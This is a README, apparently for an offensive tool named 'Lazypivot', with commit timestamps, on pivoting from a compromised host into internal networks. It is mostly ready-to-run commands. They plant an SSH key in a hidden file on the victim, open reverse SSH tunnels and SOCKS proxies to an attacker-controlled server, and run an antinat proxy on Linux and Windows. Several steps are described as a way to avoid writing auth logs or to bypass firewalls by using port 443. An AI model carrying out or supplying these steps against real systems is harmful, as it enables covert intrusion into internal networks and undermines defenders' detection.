2019-12-14 19:54:14 +01:00
# Lazypivot
Making pivoting into internal networks easier and faster so you can focus on the real fun :)
## Principles
2019-12-14 21:14:52 +01:00
The idea is to execute a socks5 server on the compromised target and forward the local port remotely via SSH.
2019-12-14 19:54:14 +01:00
A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat ](http://www.malsmith.net/antinat/ ) coming to the rescue.
## Linux
### Simpler
On our server
```
useradd -m -s /bin/nologin targetname
ssh-keygen -t ecdsa -f /tmp/sshkey -q -N ""
mkdir /home/targetname/.ssh
cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
chown -R targetname:targetname /home/targetname/.ssh
chmod 600 /home/targetname/.ssh/authorized_keys
cat /tmp/sshkey
```
Copy the content of /tmp/sshkey
On the compromised host
```
echo "my copied sshkey" >> /tmp/.keyfile
chmod 600 /tmp/.keyfile
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
```
Now on your server
```
ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
```
### Stealthier
We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
2019-12-15 23:24:03 +01:00
```
./antinat -cantinat.xml
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 0.0.0.0:32768:127.0.0.1:32768 -i /tmp/.keyfile -fNT targetname@myserver
```
2019-12-14 19:54:14 +01:00
## Windows
2019-12-15 23:24:03 +01:00
Upload the package and extract it.
2019-12-14 19:54:14 +01:00
2019-12-15 23:24:03 +01:00
Start the `antinat` binary, no admin permissions are required:
2019-12-14 19:54:14 +01:00
```
2019-12-15 23:24:03 +01:00
antinat.exe -a -cC:\temp\antinat.xml
2019-12-14 19:54:14 +01:00
```
2019-12-15 23:24:03 +01:00
Forward the antinat port with `plink` :
2019-12-14 19:54:14 +01:00
```
2019-12-15 23:24:03 +01:00
echo y | plink -ssh -noagent -pw "wrongpassword" targetname@myserver
plink -ssh -noagent -C -T -N -pw "password" -R 0.0.0.0:32768:127.0.0.1:8080 targetname@myserver
2019-12-14 19:54:14 +01:00
```
2019-12-15 23:24:03 +01:00
Putty natively supports SSH via HTTP and so does plink but it can only work via cli if a preconfigured session already exist. [More info ](https://superuser.com/questions/963563/is-it-possible-to-load-putty-connection-information-session-from-file ).
2019-12-14 19:54:14 +01:00
## Tips
* Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
* [User corkscrew for SSH via HTTP Proxy ](https://github.com/bryanpkc/corkscrew )